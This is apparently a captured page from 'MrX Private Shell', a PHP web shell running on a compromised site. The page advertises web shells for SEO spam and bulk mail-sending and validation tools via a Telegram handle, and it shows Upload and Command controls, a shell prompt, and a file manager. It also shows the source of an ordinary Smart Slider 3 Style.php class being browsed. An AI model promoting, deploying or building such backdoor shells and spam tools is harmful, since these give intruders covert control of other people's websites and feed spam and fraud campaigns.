__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php


namespace Nextend\SmartSlider3\Renderable\Component;


class Style {

    public $styles = array(
        'all'              => array(),
        'desktoplandscape' => array(),
        'tabletlandscape'  => array(),
        'tabletportrait'   => array(),
        'mobilelandscape'  => array(),
        'mobileportrait'   => array(),

    );

    /**
     * @var AbstractComponent
     */
    protected $component;

    /**
     * Style constructor.
     *
     * @param AbstractComponent $component
     */
    public function __construct($component) {
        $this->component = $component;
    }

    public function add($device, $selector, $css) {

        if (!empty($css)) {

            if ($device == 'desktopportrait') {
                $device = 'all';
            }

            $this->addOnly($device, $selector, $css);
        }
    }

    public function addOnly($device, $selector, $css) {

        if (!empty($css)) {

            if (!isset($this->styles[$device][$selector])) {
                $this->styles[$device][$selector] = array();
            }

            $this->styles[$device][$selector][] = $css;
        }
    }

}

Filemanager

Name Type Size Permission Actions
AbstractComponent.php File 29.59 KB 0664
ComponentCol.php File 14.08 KB 0664
ComponentContent.php File 7 KB 0664
ComponentLayer.php File 2.95 KB 0664
ComponentRow.php File 15.25 KB 0664
ComponentSlide.php File 4.92 KB 0664
Style.php File 1.13 KB 0664
Filemanager